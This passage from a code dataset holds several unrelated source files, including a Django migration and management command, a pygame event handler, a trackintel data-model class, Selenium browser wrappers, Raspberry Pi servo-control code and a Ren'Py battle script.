set_code=\"%s\"' % (\n text4[0], text4[1], text4[2], text4[3], text4[4]))\n if fact:\n print(\"areacode:\", text4[:5], \"删除失败\")\n else:\n print(\"areacode:\", text4[:5], \"删除成功\")\n db.close()\n\n# import CINTEL_FZweb3_1_1.HTMLTestRunner.HTMLTestReportEN as HTMLTestRunner\n# if __name__ == 'set_code_add':\n# reporter_dir = r's.html'\n# re_open = open(reporter_dir, 'wb')\n# suite = unittest.TestLoader().loadTestsFromTestCase(Set_code)\n# runner = HTMLTestRunner.HTMLTestRunner(\n# stream=re_open,\n# title=\"FZweb3.1.2局点编号添加功能\",\n# description='测试报告',\n# )\n# runner.run(suite)","sub_path":"case/basic_data_case/set_code_del.py","file_name":"set_code_del.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185781770","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('members', '0047_pushover'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='membership',\n name='membership_type',\n field=models.CharField(choices=[('R', 'Regular'), ('W', 'Work-Trade'), ('S', 'Scholarship'), ('C', 'Complimentary'), ('G', 'Group'), ('F', 'Family'), ('K', 'Gift Card')], default='R', max_length=1, help_text='The type of membership.'),\n ),\n ]\n","sub_path":"members/migrations/0048_auto_20160503_1052.py","file_name":"0048_auto_20160503_1052.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"286689075","text":"#-*- encoding: utf-8 -*-\n\"\"\"균형잡힌 세상\"\"\"\n\nimport sys\n\nwhile 1 :\n stack = []\n strings = sys.stdin.readline().rstrip()\n flag = 1\n\n for i in strings :\n if i == '(' or i == '[' :\n stack.append(i)\n elif i == ')' :\n if stack and stack[-1] == '(' :\n stack.pop()\n else :\n flag = 0\n break\n elif i == ']' :\n if stack and stack[-1] == '[' :\n stack.pop()\n else :\n flag = 0\n break\n\n if strings == '.' :\n break\n\n if flag and not stack :\n print('yes')\n else :\n print('no')","sub_path":"BOJ/STACK/4949.py","file_name":"4949.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596966565","text":"##Blitting\nimport pygame\nfrom logHelper import *\npygame.init()\ndef blit(displayScreen, vardict, Textures, Player, blitrect, objList):\n for obj in objList:\n displayScreen.blit(obj.img, obj.rect)\n \n containedByScreen = []\n for i in objList:\n if blitrect.colliderect(i.rect):\n containedByScreen.append(i)\n displayScreen.blit(Player.player,(320,240))\n pygame.display.update(containedByScreen)\n \n##Events\ndef eventhandler(player, textures, gamevariables, event, keyinput, gameScreen, resources, objList): #Handle events\n returntext = ''\n ##Player movement\n \n if keyinput[pygame.K_ESCAPE]: #If the player presses escape, exit the game\n returntext = 'End'\n log(\"Going back to menu\")\n \n if event.type == pygame.QUIT:\n returntext = 'End'\n log(\"Going back to menu\")\n \n if keyinput[pygame.K_UP] and (keyinput[pygame.K_LEFT] or keyinput[pygame.K_RIGHT]): #If the player presses a key combo, move everything\n \n for obj in objList: \n obj.rect.move_ip(0, player.SPEED/2)\n\n \n if keyinput[pygame.K_LEFT]: #If the player presses left, move\n for obj in objList:\n obj.rect.move_ip(player.SPEED/2, 0)\n \n elif keyinput[pygame.K_RIGHT]: #If the player presses right, move\n for obj in objList:\n obj.rect.move_ip(-player.SPEED/2, 0)\n \n\n \n elif keyinput[pygame.K_UP]: #If the player presses up, move\n \n for obj in objList: \n obj.rect.move_ip(0, player.SPEED)\n \n if keyinput[pygame.K_DOWN] and (keyinput[pygame.K_LEFT] or keyinput[pygame.K_RIGHT]): #If the player presses a key combo, move\n \n for obj in objList:\n obj.rect.move_ip(0, -player.SPEED/2)\n \n if keyinput[pygame.K_LEFT]: #If the player presses left, move\n for obj in objList:\n obj.rect.move_ip(player.SPEED/2, 0)\n \n elif keyinput[pygame.K_RIGHT]: #If the player presses right, move\n \n for obj in objList:\n obj.rect.move_ip(-player.SPEED/2, 0)\n \n elif keyinput[pygame.K_DOWN]: #If the player presses down, move\n \n for obj in objList:\n obj.rect.move_ip(0, -player.SPEED)\n\n if keyinput[pygame.K_LEFT]: #If the player presses left, move\n for obj in objList:\n obj.rect.move_ip(player.SPEED, 0)\n\n if keyinput[pygame.K_RIGHT]: #If the player presses right, move\n for obj in objList:\n obj.rect.move_ip(-player.SPEED, 0)\n \n \n \n \n ##Other Keybindings\n \n if keyinput[pygame.K_RETURN]: #If the player presses the interact button\n for i in objList:\n if player.rect.colliderect(i.rect):\n player = i.interact(player)\n\n if keyinput[pygame.K_i]: #If the player presses the inventory button\n log('Inventory')\n printtext(str(player.inventory).replace('{','').replace('}','').replace(',',';').replace('\"','').replace(\"'\",''), gameScreen, gamevariables, textures, player, spritelist, rectlist, objList, resources )\n \n return returntext\n ","sub_path":"resources/libraries/mainloop.py","file_name":"mainloop.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"389845511","text":"import pandas as pd\nimport geopandas as gpd\nimport trackintel as ti\nfrom trackintel.geogr.distances import calculate_distance_matrix\nfrom trackintel.io.file import write_positionfixes_csv\nfrom trackintel.io.postgis import write_positionfixes_postgis\nfrom trackintel.model.util import _copy_docstring\nfrom trackintel.preprocessing.positionfixes import generate_staypoints, generate_triplegs\nfrom trackintel.model.util import (\n get_speed_positionfixes,\n TrackintelBase,\n TrackintelGeoDataFrame,\n _register_trackintel_accessor,\n)\n\n_required_columns = [\"user_id\", \"tracked_at\"]\n\n\n@_register_trackintel_accessor(\"as_positionfixes\")\nclass Positionfixes(TrackintelBase, TrackintelGeoDataFrame, gpd.GeoDataFrame):\n \"\"\"A pandas accessor to treat (Geo)DataFrames as collections of `Positionfixes`.\n\n This will define certain methods and accessors, as well as make sure that the DataFrame\n adheres to some requirements.\n\n Requires at least the following columns:\n ['user_id', 'tracked_at']\n\n Requires valid point geometries; the 'index' of the GeoDataFrame will be treated as unique identifier\n of the `Positionfixes`.\n\n For several usecases, the following additional columns are required:\n ['elevation', 'accuracy' 'staypoint_id', 'tripleg_id']\n\n Notes\n -----\n In GPS based movement data analysis `Positionfixes` are the smallest unit of tracking and\n represent timestamped locations.\n\n 'tracked_at' is a timezone aware pandas datetime object.\n\n Examples\n --------\n >>> df.as_positionfixes.generate_staypoints()\n \"\"\"\n\n def __init__(self, *args, validate_geometry=True, **kwargs):\n # could be moved to super class\n # validate kwarg is necessary as the object is not fully initialised if we call it from _constructor\n # (geometry-link is missing). thus we need a way to stop validating too early.\n super().__init__(*args, **kwargs)\n self._validate(self, validate_geometry=validate_geometry)\n\n # create circular reference directly -> avoid second call of init via accessor\n @property\n def as_positionfixes(self):\n return self\n\n @staticmethod\n def _validate(obj, validate_geometry=True):\n assert obj.shape[0] > 0, f\"Geodataframe is empty with shape: {obj.shape}\"\n # check columns\n if any([c not in obj.columns for c in _required_columns]):\n raise AttributeError(\n \"To process a DataFrame as a collection of positionfixes, it must have the properties\"\n f\" {_required_columns}, but it has [{', '.join(obj.columns)}].\"\n )\n # check timestamp dtypes\n assert pd.api.types.is_datetime64tz_dtype(\n obj[\"tracked_at\"]\n ), f\"dtype of tracked_at is {obj['tracked_at'].dtype} but has to be datetime64 and timezone aware\"\n\n # check geometry\n if validate_geometry:\n assert (\n obj.geometry.is_valid.all()\n ), \"Not all geometries are valid. Try x[~ x.geometry.is_valid] where x is you GeoDataFrame\"\n\n if obj.geometry.iloc[0].geom_type != \"Point\":\n raise AttributeError(\"The geometry must be a Point (only first checked).\")\n\n @staticmethod\n def _check(obj, validate_geometry=True):\n \"\"\"Check does the same as _validate but returns bool instead of potentially raising an error.\"\"\"\n if any([c not in obj.columns for c in _required_columns]):\n return False\n if obj.shape[0] <= 0:\n return False\n if not pd.api.types.is_datetime64tz_dtype(obj[\"tracked_at\"]):\n return False\n if validate_geometry:\n return obj.geometry.is_valid.all() and obj.geometry.iloc[0].geom_type == \"Point\"\n return True\n\n @property\n def center(self):\n \"\"\"Return the center coordinate of this collection of positionfixes.\"\"\"\n lat = self.geometry.y\n lon = self.geometry.x\n return (float(lon.mean()), float(lat.mean()))\n\n @_copy_docstring(generate_staypoints)\n def generate_staypoints(self, *args, **kwargs):\n \"\"\"\n Generate staypoints from this collection of positionfixes.\n\n See :func:`trackintel.preprocessing.positionfixes.generate_staypoints`.\n \"\"\"\n return ti.preprocessing.positionfixes.generate_staypoints(self, *args, **kwargs)\n\n @_copy_docstring(generate_triplegs)\n def generate_triplegs(self, staypoints=None, *args, **kwargs):\n \"\"\"\n Generate triplegs from this collection of positionfixes.\n\n See :func:`trackintel.preprocessing.positionfixes.generate_triplegs`.\n \"\"\"\n return ti.preprocessing.positionfixes.generate_triplegs(self, staypoints, *args, **kwargs)\n\n @_copy_docstring(write_positionfixes_csv)\n def to_csv(self, filename, *args, **kwargs):\n \"\"\"\n Store this collection of trackpoints as a CSV file.\n\n See :func:`trackintel.io.file.write_positionfixes_csv`.\n \"\"\"\n ti.io.file.write_positionfixes_csv(self, filename, *args, **kwargs)\n\n @_copy_docstring(write_positionfixes_postgis)\n def to_postgis(\n self, name, con, schema=None, if_exists=\"fail\", index=True, index_label=None, chunksize=None, dtype=None\n ):\n \"\"\"\n Store this collection of positionfixes to PostGIS.\n\n See :func:`trackintel.io.postgis.write_positionfixes_postgis`.\n \"\"\"\n ti.io.postgis.write_positionfixes_postgis(\n self, name, con, schema, if_exists, index, index_label, chunksize, dtype\n )\n\n @_copy_docstring(calculate_distance_matrix)\n def calculate_distance_matrix(self, *args, **kwargs):\n \"\"\"\n Calculate pair-wise distance among positionfixes or to other positionfixes.\n\n See :func:`trackintel.geogr.distances.calculate_distance_matrix`.\n \"\"\"\n return ti.geogr.distances.calculate_distance_matrix(self, *args, **kwargs)\n\n @_copy_docstring(get_speed_positionfixes)\n def get_speed(self, *args, **kwargs):\n \"\"\"\n Compute speed per positionfix (in m/s)\n\n See :func:`trackintel.model.util.get_speed_positionfixes`.\n \"\"\"\n return ti.model.util.get_speed_positionfixes(self, *args, **kwargs)\n","sub_path":"trackintel/model/positionfixes.py","file_name":"positionfixes.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"60272518","text":"\"\"\"\n WeasyPrint\n ==========\n\n WeasyPrint converts web documents to PDF.\n\n The public API is what is accessible from this \"root\" packages\n without importing sub-modules.\n\n :copyright: Copyright 2011-2020 Simon Sapin and contributors, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver import DesiredCapabilities\n\n\nclass FakeChrome(object):\n _browser = None\n\n def __new__(cls, executable_path=\"chromedriver\", **kwargs):\n if cls._browser is None:\n options = kwargs.pop('options', webdriver.ChromeOptions())\n if kwargs.pop('headless', False):\n options.add_argument('headless')\n options.add_argument(f\"--width={kwargs.pop('width', 2480)}\")\n options.add_argument(f\"--height={kwargs.pop('height', 3508)}\")\n options.add_argument('--allow-file-access-from-files')\n\n dc = kwargs.pop('desired_capabilities', DesiredCapabilities.CHROME)\n if 'goog:loggingPrefs' not in dc:\n dc['goog:loggingPrefs'] = {'browser': 'ALL'}\n cls._browser = webdriver.Chrome(\n executable_path,\n chrome_options=options,\n desired_capabilities=dc,\n **kwargs\n )\n return cls._browser\n\n\nclass FakeFirefox(object):\n _browser = None\n\n def __new__(cls, executable_path=\"geckodriver\", **kwargs):\n if cls._browser is None:\n options = kwargs.pop('options', webdriver.FirefoxOptions())\n if kwargs.pop('headless', False):\n options.add_argument('-headless')\n # options.add_argument(f\"--width={kwargs.pop('width', 2480)}\")\n # options.add_argument(f\"--height={kwargs.pop('height', 3508)}\")\n\n dc = kwargs.pop('desired_capabilities', DesiredCapabilities.FIREFOX)\n # if 'loggingPrefs' not in dc:\n # dc['loggingPrefs'] = {'browser': 'ALL'}\n cls._browser = webdriver.Firefox(\n executable_path,\n firefox_options=options,\n desired_capabilities=dc,\n **kwargs\n )\n return cls._browser\n","sub_path":"weasyprint/headless_browser.py","file_name":"headless_browser.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157443822","text":"import RPi.GPIO as GPIO\nimport time\nfrom gpiozero import Servo\n\ndef move_arm():\n claw = Servo(19,0)\n updown = 12\n elbow = Servo(13)\n\n rotate = 21\n GPIO.setmode(GPIO.BCM)\n\n GPIO.setup(rotate, GPIO.OUT)\n GPIO.setup(updown, GPIO.OUT)\n r = GPIO.PWM(rotate, 50)\n p = GPIO.PWM(updown, 50)\n\n #p.start(9.5)\n r.start(2.5)\n\n claw.mid()\n r.ChangeDutyCycle(2.5)\n print(\"Moved towards tubes\")\n time.sleep(2)\n print(\"Grabbing tube\")\n time.sleep(2)\n claw.max()\n time.sleep(5)\n\n print(\"Moving to user\")\n r.ChangeDutyCycle(12.5)\n time.sleep(2)\n print(\"Closing claw\")\n time.sleep(2)\n\n #GPIO.cleanup()\n #claw.stop()\n\ndef calibrate_updown():\n p.ChangeDutyCycle(7.5)\n\ndef calibrate_rotate():\n r.ChangeDutyCycle(2.5)\n\ndef calibrate():\n r.ChangeDutyCycle(7.5)\n claw.max()\n elbow.mid()\n p.ChangeDutyCycle(22.5)\n print(\"Calibrating - everything in mid position, claw closed\")\n time.sleep(2)\n\ndef grab_tube():\n claw.mid()\n r.ChangeDutyCycle(2.5)\n print(\"Moved towards tubes\")\n time.sleep(2)\n print(\"Grabbing tube\")\n time.sleep(2)\n claw.max()\n time.sleep(2)\n\ndef grab_swab():\n r.ChangeDutyCycle(3.5)\n claw.max()\n elbow.mid()\n print(\"Moved towards tubes\")\n time.sleep(2)\n print(\"Grabbing tube\")\n p.ChangeDutyCycle(22.5)\n claw.value = 0.65\n claw.mid()\n time.sleep(3)\n claw.max()\n time.sleep(1)\n print(\"Moving up\")\n #p.ChangeDutyCycle(27.5)\n time.sleep(2)\n\ndef release():\n print(\"Moving to user\")\n r.ChangeDutyCycle(12.5)\n time.sleep(2)\n print(\"Closing claw\")\n time.sleep(2)\n\n#calibrate()\n#time.sleep(5)\n#grab_tube()\n#claw.max()\n#claw.mid()\n#time.sleep(3)\n#claw.max()\n#release()\n#calibrate_updown()\n#time.sleep(2)\n#calibrate_rotate()\n#time.sleep(2)\n#p.stop()\n#r.stop()\n#GPIO.cleanup()\n#claw.stop()\n","sub_path":"arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"414302223","text":"from datetime import timedelta\nfrom django.core.management.base import BaseCommand, CommandError\nfrom liquid.plans.models import Seller\n\n\nclass Command(BaseCommand):\n help = 'Create default buyer role'\n\n def add_arguments(self, parser):\n parser.add_argument('name', type=str)\n parser.add_argument('restart_time', type=int)\n parser.add_argument('maximum_cards', type=int)\n parser.add_argument('discounts_enabled', type=bool)\n parser.add_argument('maximum_sale', type=float)\n parser.add_argument('selling_rate', type=float)\n parser.add_argument('fixed_rate', type=float)\n\n def handle(self, *args, **options):\n name = options['name']\n restart_time = timedelta(options['restart_time'])\n maximum_cards = options['maximum_cards']\n maximum_sale = options['maximum_sale']\n selling_rate = options['selling_rate']\n fixed_rate = options['fixed_rate']\n is_default = True\n\n try:\n seller = Seller.objects.create(\n name=name,\n restart_time=restart_time,\n maximum_cards=maximum_cards,\n maximum_sale=maximum_sale,\n selling_rate=selling_rate,\n fixed_rate=fixed_rate,\n is_default=is_default,\n )\n seller.save()\n except:\n raise CommandError('Error creating default seller role')\n\n self.stdout.write('Default seller created successfully.')\n","sub_path":"procodific-backend/liquid/plans/management/commands/create_default_seller.py","file_name":"create_default_seller.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594757607","text":"import renpy.store as store\r\nimport renpy.exports as renpy\r\n\r\nimport logger\r\nimport StringIO\r\nimport pprint\r\n\r\n#Temp fix for missing modules\r\nfrom .. prepackaged.chasingLight import *\r\n\r\n\r\nclass battleScript(store.object):\r\n def __init__(self, myGameDir, importSettings, *args): #expected args would be a list of PC characters\r\n \r\n #take care of appropriate imports\r\n self.importSettings = importSettings\r\n \r\n# if self.importSettings[\"package\"] == \"chasingLight\":\r\n# from .. prepackaged.chasingLight import *\r\n# elif self.importSettings[\"package\"] == \"fantasy\":\r\n# from .. prepacked.fantasy import *\r\n# elif self.importSettings[\"package\"] == \"scifi\":\r\n# from .. prepackaged.scifi import *\r\n# elif self.importSettings[\"package\"] == \"none\":\r\n# #set board style\r\n# if self.importSettings[\"board\"] == \"hex\":\r\n# from .. board_style.hex import *\r\n# elif self.importedSettings[\"board\"] == \"square\":\r\n# from .. board_style.square import *\r\n \r\n self.gameDir = myGameDir\r\n self.battleName = \"Battle_Script_Base_Class\"\r\n\r\n self.battleScreenBG = \"white\"\r\n self.tutorial = False\r\n self.reply = None # this is used for dealing with use input during battles\r\n \r\n self.settings = {}\r\n self.settings[\"grid\"] = None\r\n self.settings[\"showGrid\"] = True\r\n self.settings[\"showBorder\"] = True\r\n self.settings[\"showHeader\"] = True\r\n self.settings[\"showFooter\"] = False #possibly depriciated\r\n self.settings[\"damage\"] = False #set to true to add damage images and remove conflicting graphics\r\n self.settings[\"showOrder\"] = True\r\n self.settings[\"showPaneEdge\"] = False\r\n self.settings[\"showPane\"] = False\r\n self.settings[\"showBack\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"controls\"] = {}\r\n self.settings[\"controls\"][\"showActionButton\"] = True\r\n self.settings[\"controls\"][\"showExamineButton\"] = True\r\n\r\n self.settings[\"showActionList\"] = False\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"unitSelectForAttack\"] = False\r\n self.settings[\"unitSelectQue\"] = []\r\n \r\n self.settings[\"combatantList\"] = {}\r\n \r\n if args != None: #if we were passed a list of PC combatants\r\n self.settings[\"combatantList\"][\"pc\"] = []\r\n for x in xrange(len(args)):\r\n self.settings[\"combatantList\"][\"pc\"].append(args[x])\r\n\r\n\r\n else: #just in-case we weren't passed a list of PC combatatnts\r\n self.settings[\"combatantList\"][\"pc\"] = []\r\n self.settings[\"TotNumOfPCs\"] = 0 \r\n for item in range(len(self.settings[\"combatantList\"][\"pc\"])):\r\n self.settings[\"TotNumOfPCs\"] += 1\r\n \r\n self.settings[\"combatantList\"][\"npc\"] = []\r\n self.settings[\"TotNumOfNPCs\"] = 0\r\n \r\n\r\n\r\n \r\n def createLogger(self):\r\n self.scriptLogger = logger.Logger(self.myGameDir + \"\\\\logs\\\\script_\" + self.battleName + \"_log.log\")\r\n \r\n def getCombatantList(self):\r\n return self.settings[\"combatantList\"]\r\n \r\n# def prettyPrintChars(self, appendage):\r\n# \"\"\"\r\n# Possibly not useful anymore... have to look into other uses for this besires allowing JUST the character lists to be printed\r\n# \"\"\"\r\n# outputString = self.battleName + \" Data: \\n\\n\"\r\n \r\n# outputString += appendage + \"PC Character List:\\n\"\r\n# outputString += appendage + \"Total Number of PCs:\" + str(self.settings[\"TotNumOfPCs\"]) + \"\\n\"\r\n# for item in range(len(self.settings[\"combatantList\"][\"pc\"])):\r\n# if (self.settings[\"combatantList\"][\"pc\"][item] == None):\r\n# outputString += appendage + \"PC\" + str(item) + \": No Unit!\\n\"\r\n# elif(self.settings[\"combatantList\"][\"pc\"][item] != None):\r\n# outputString += appendage + \"NPC\" + str(item) + \":\\n\" + self.settings[\"combatantList\"][\"pc\"][item].prettyPrint(\"\\t\\t\")\r\n \r\n# outputString += \"\\n\" \r\n# outputString += appendage + \"NPC Character List:\\n\"\r\n# outputString += appendage + \"Total Number of NPCs:\" + str(self.settings[\"TotNumOfNPCs\"]) + \"\\n\"\r\n# for item in range(len(self.settings[\"combatantList\"][\"npc\"])):\r\n# if (self.settings[\"combatantList\"][\"npc\"][item] == None):\r\n# outputString += appendage + \"NPC\" + str(item) + \": No Unit!\\n\"\r\n# elif(self.settings[\"combatantList\"][\"npc\"][item] != None):\r\n# outputString += appendage + \"NPC\" + str(item) + \":\\n\" + self.settings[\"combatantList\"][\"npc\"][item].prettyPrint(\"\\t\\t\")\r\n \r\n# return outputString\r\n\r\n def blitScreen(self):\r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"BlitScreen\")\r\n reply = renpy.call_screen(\"chasingLightBattleScreen\", self.battleScreenBG, self.settings)\r\n self.scriptLogger.writeTo(\"BlitScreen: Success!\")\r\n \r\n return reply\r\n \r\n def blitConvo(self, who, what, characterList):\r\n \"\"\" who is the name of the say-er\r\n what is what the say-er will say\r\n character list is a dictionary of tuples containing the\r\n location of a character sprite to show and the x and y positions to\r\n show it at\r\n \"\"\"\r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"BlitConvo: who->\" + who + \" what->\\\"\" + what + \"\\\"\")\r\n #add a part to log the characters the call is supposed to display\r\n screen_cfg = (self.battleScreenBG, self.settings, self.importSettings[\"battleScreenName\"])\r\n renpy.call_screen(\"say2\", screen_cfg, who, what, characterList)\r\n self.scriptLogger.writeTo(\"BlitConvo: Success!\")\r\n self.scriptLogger.pump()\r\n\r\n def parseReply(self):\r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"Attempting to parse reply...\")\r\n if(type(self.reply) != tuple):\r\n self.scriptLogger.writeTo(\"Reply is not a tuple.\")\r\n \r\n if self.reply == \"showPane\":\r\n self.settings[\"showPane\"] = True\r\n self.settings[\"showPaneEdge\"] = False\r\n self.settings[\"showControls\"] = False\r\n self.settings[\"showBack\"] = True\r\n self.scriptLogger.writeTo(\"Reply sucessfully parsed as a request to show the side pane.\")\r\n \r\n if self.reply == \"showActions\":\r\n self.settings[\"showActionList\"] = True\r\n self.settings[\"showControls\"] = False\r\n self.settings[\"showBack\"] = True\r\n self.scriptLogger.writeTo(\"Reply sucessfully parsed as a request to show the actions list.\")\r\n if len(self.settings[\"unitSelectQue\"]) > 0: #this will deselect any units when we go to make an action\r\n self.scriptLogger.writeTo(\"To do this we must enmpy the selection que.\")\r\n for x in xrange(len(self.settings[\"unitSelectQue\"])):\r\n self.scriptLogger.writeTo(\"Unit Deselected: \" + str(self.settings[\"unitSelectQue\"][x][0]) + str(self.settings[\"unitSelectQue\"][x][1]))\r\n self.settings[\"unitSelectQue\"].pop()\r\n self.settings[\"showPaneEdge\"] = False\r\n\r\n if self.reply == \"prepUnitSelect\":\r\n self.settings[\"unitSelect\"] = True\r\n self.settings[\"showControls\"] = False\r\n self.settings[\"showBack\"] = True\r\n self.scriptLogger.writeTo(\"Reply sucessfully parsed as a request to show unit select options.\")\r\n if len(self.settings[\"unitSelectQue\"]) > 0: #for now this will make it so that only one unit can be selected\r\n self.scriptLogger.writeTo(\"For now, to do this we must enmpy the selection que.\")\r\n for x in xrange(len(self.settings[\"unitSelectQue\"])):\r\n self.scriptLogger.writeTo(\"Unit Deselected: \" + str(self.settings[\"unitSelectQue\"][x][0]) + str(self.settings[\"unitSelectQue\"][x][1]))\r\n self.settings[\"unitSelectQue\"].pop()\r\n self.settings[\"showPaneEdge\"] = False\r\n \r\n if self.reply == \"back\":\r\n if self.settings[\"showActionList\"]:\r\n self.settings[\"showActionList\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showBack\"] = False\r\n self.scriptLogger.writeTo(\"Reply sucessfully parsed as a request to exit the actions list via the back button.\")\r\n if self.settings[\"unitSelect\"]:\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showBack\"] = False\r\n self.scriptLogger.writeTo(\"Reply sucessfully parsed as a request to exit unit select via the back button.\")\r\n \r\n if self.settings[\"showBack\"]:\r\n if self.settings[\"showPane\"]:\r\n self.settings[\"showPane\"] = False\r\n self.settings[\"showBack\"] = False\r\n self.settings[\"showPaneEdge\"] = True\r\n self.settings[\"showControls\"] = True\r\n self.scriptLogger.writeTo(\"Reply sucessfully parsed a request to exit the stats pane\")\r\n \r\n elif(type(self.reply) == tuple):\r\n self.scriptLogger.writeTo(\"Reply is a tuple.\")\r\n if len(self.reply) == 2:\r\n self.scriptLogger.writeTo(\"Reply has 2 elemets.\")\r\n \r\n #else: un comment once some ifs are added\r\n self.scriptLogger.writeTo(\"Failed to parse: \" + str(self.reply) + \"!\")\r\n elif len(self.reply) == 3:\r\n self.scriptLogger.writeTo(\"Reply has 3 elements.\")\r\n if self.reply[0] == \"selectedUnit\":\r\n #todo: figure out how to select by row/column, passing a list of units in that area\r\n #todo:write code to handle the selected unit better\r\n self.settings[\"unitSelectQue\"].append((self.reply[1], self.reply[2]))\r\n self.scriptLogger.writeTo(\"Reply sucessfully parsed as a unitSelcect. Added \" + str(self.reply[1]) + str(self.reply[2]) + \" to selection que.\")\r\n if not self.settings[\"unitSelectForAttack\"] and len(self.settings[\"unitSelectQue\"]) < 2:\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showPaneEdge\"] = True\r\n self.scriptLogger.writeTo(\"Revealed the info pane edge button so that if the user want's they can view this unit's stats.\")\r\n \r\n\r\n else:\r\n self.settings[\"unitSelect\"] = False\r\n self.settings[\"showControls\"] = True\r\n self.settings[\"showBack\"] = False\r\n self.scriptLogger.writeTo(\"Unfortunately, we don't know what to do with this info yet!!!\")\r\n else: \r\n self.scriptLogger.writeTo(\"Failed to parse: \" + str(self.reply) + \"!\")\r\n\r\n \r\n self.scriptLogger.pump()\r\n \r\n def generateString(self):\r\n output = StringIO.StringIO()\r\n pp = pprint.PrettyPrinter(indent=4, stream=output)\r\n output.write(\"Settings dict:\\n\\n\")\r\n pp.pprint(self.settings)\r\n return output.getvalue()\r\n\r\n\r\n\r\n\r\n def buildGrid(self, gridX, gridY):\r\n self.settings[\"grid\"] = []\r\n for x in xrange(gridX):\r\n self.settings[\"grid\"].append([])\r\n for y in xrange(gridY):\r\n self.settings[\"grid\"].append(\"x\")\r\n \r\n def populateGrid(self, objects):\r\n pass\r\n #a method meant for populating the grid with characters and possibly objects\r\n #the objects parameter is a dict of objects, which the set of indices are used as ID tags for \r\n #referencing objects on the map. walls are prefixed by wall, terrain by terr, characters, by char, \r\n #objectives by obj, items by item, cover by cov.\r\n \r\n\r\n#################################################################\r\n#################################################################\r\nclass firstBattle(battleScript):\r\n \r\n\r\n def __init__(self, myGameDir, importSettings, *args):\r\n self.myGameDir = myGameDir\r\n battleScript.__init__(self, self.myGameDir, importSettings, args)\r\n self.battleName = \"firstBattle\"\r\n self.chapterUnits()\r\n self.createLogger()\r\n #custom overrides for instantiation go below here\r\n \r\n\r\n\r\n def script(self):\r\n \"\"\"\r\n During battles, the script uses blitConvo to show say statements and character sprites over the top of the \r\n battleScreen. \r\n To allow the player to control the units, blitScreen is used to send the screen with the list of available options having\r\n been defined in the setting argument passed to renpy.call_screen both functions (blitScreen and this instance of renpy.call) will\r\n send back a response, likely in the form of a tuple. This tuple should then be parsed out and appropriately validate and handle the user's input.\r\n syntax\r\n ( action, effecting, listOfEffected)\r\n ( melee, team1-unit1, list[])\r\n ( ranged, team2unit-3, team1-unit2)\r\n \r\n e.g. Unit 1's turn; unit 1 wants to attack unit 3; \r\n\r\n\r\n \r\n \"\"\"\r\n \r\n self.scriptLogger.writeTo(\"Starting script execution...\")\r\n self.scriptLogger.dsplat()\r\n self.scriptLogger.pump()\r\n \r\n while 1==1:\r\n\r\n self.blitConvo(\"Test\", \"TESTING\", None)\r\n self.reply = self.blitScreen()\r\n self.scriptLogger.writeTo(\"Blitscreen reply \" + str(self.reply))\r\n self.scriptLogger.pump()\r\n \r\n \r\n self.parseReply()\r\n \r\n \r\n \r\n\r\n \r\n \r\n self.scriptLogger.psp()\r\n self.scriptLogger.writeTo(\"Finished executing script, returning control to battle server\")\r\n\r\n \r\n def uniqueToString():\r\n pass\r\n \"\"\"\r\n #todo:write overloaded toString method, calling the super version first -> in error, i made \r\n dumpToLog. It will work fine as a temp fix for now, but eventually one we start getting more\r\n unique instance variables, we'll want to re-do the dumpToLog, probably by just copy-pasting and adding\r\n as needed, then tailoring this (called uniqueToString) to sent instance unique variables to a string to\r\n get added to the dumpToLog override.\r\n \"\"\"\r\n\r\n def chapterUnits(self):\r\n #use this to re-define the list of units, as basically all battles should\r\n #use something different from the default of no units\r\n self.settings[\"combatantList\"] = {}\r\n self.settings[\"combatantList\"][\"pc\"] = []\r\n \r\n #Append PC's to be added here\r\n self.settings[\"combatantList\"][\"pc\"].append(unit_module.BasicGroundUnit())\r\n \r\n \r\n self.settings[\"combatantList\"][\"npc\"] = []\r\n #append NPC's to be added here \r\n \r\n self.settings[\"TotNumOfPCs\"] = 0 \r\n self.settings[\"TotNumOfNPCs\"] = 0\r\n for item in range(len(self.settings[\"combatantList\"][\"pc\"])):\r\n self.settings[\"TotNumOfPCs\"] += 1\r\n for item in range(len(self.settings[\"combatantList\"][\"npc\"])):\r\n self.settings[\"TotNumOfNPCs\"] += 1\r\n\r\n\r\n\r\n#################################################################\r\n#################################################################\r\n ","sub_path":"game/darkness/base/battleScripts.py","file_name":"battleScripts.py","file_ext":"py","file_size_in_byte":16122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"242098710","text":"# voted={}\n#\n# def check_voter(name):\n# if voted.get(name):\n# print(\"kick them out\")\n# else:\n# print(\"let him 